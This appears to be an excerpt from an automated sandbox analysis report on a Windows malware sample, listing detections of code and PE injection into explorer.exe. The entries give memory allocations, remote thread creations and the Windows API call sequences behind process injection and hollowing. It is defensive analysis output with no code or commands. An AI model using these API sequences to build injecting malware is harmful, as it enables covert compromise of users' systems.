            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BB0000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject code into remote processesShow sources
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24054984 CreateProcessA,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,TerminateProcess,ResumeThread,20_2_24054984
            Contains functionality to inject threads in other processesShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,1_2_0040AF08
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 4_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,4_2_0040AF08
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 5_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,5_2_0040AF08
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: 9_2_0040AF08 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,9_2_0040AF08
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403B354 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,20_2_2403B354
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3350000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3610000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3650000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3690000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3B30000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3B70000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3BA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3BF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3C20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5410000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5470000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 54B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 54E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5610000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 56C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5700000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 57B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 57F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 58A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 58E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5910000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 59D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5A00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5AC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5AF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5BB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5BE0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5CA0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5CD0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5D10000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5DC0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5E00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5EB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5EF0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5F10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: CD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: D90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: E10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4E10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4E40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4E80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4EB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4F00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4F60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4FA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 4FD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5090000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 50C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5180000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 51B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5270000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 52A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 52E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5390000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 53D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5480000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 54C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5570000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 56A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 56D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5790000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 57C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5880000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 58B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5970000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 59A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 59E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5A80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 32F0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 33B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 33F0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3630000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3A50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3A90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3AC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3B00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3B30000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5320000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5380000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 53C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5470000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 54C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5570000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5660000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 56A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 56D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5790000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 57C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5880000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 58B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5970000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 59A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5A60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5A90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5AD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5B80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5BC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5C70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5CB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5D60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5DA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5E90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5EB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3350000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3610000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3650000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 3690000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 52F0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5330000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5360000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 53A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 53D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5410000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5470000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 54B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5560000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 55D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5690000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 56C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5780000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 57B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5870000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 58A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5960000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5990000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 59D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5A80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5AC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5B70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5BB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5C60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5CA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5CD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5D90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5DC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5E80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5EB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5F70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeThread created: C:\Windows\SysWOW64\explorer.exe EIP: 5F90000Jump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 24010000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24080000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: unknown base: 24080000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24010000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: unknown base: 240F0000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24010000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: unknown base: 24160000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24010000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 2990000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4C00000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4C20000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4CB0000 value: 4CJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4D40000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 61B0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 61F0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6280000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 62A0000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 62C0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6550000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6570000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6590000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 65C0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7450000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7480000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 64E0000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6500000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6520000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 6540000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7620000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7640000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7670000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 76A0000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 76D0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7420000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7700000 value: 52Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7730000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7760000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 77B0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 77E0000 value: 41Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7810000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7470000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7840000 value: 63Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7870000 value: 41Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 78A0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 78E0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7910000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7940000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7970000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 79A0000 value: 42Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 78B0000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 75A0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 75D0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7600000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7A50000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7A80000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 79C0000 value: 47Jump to behavior
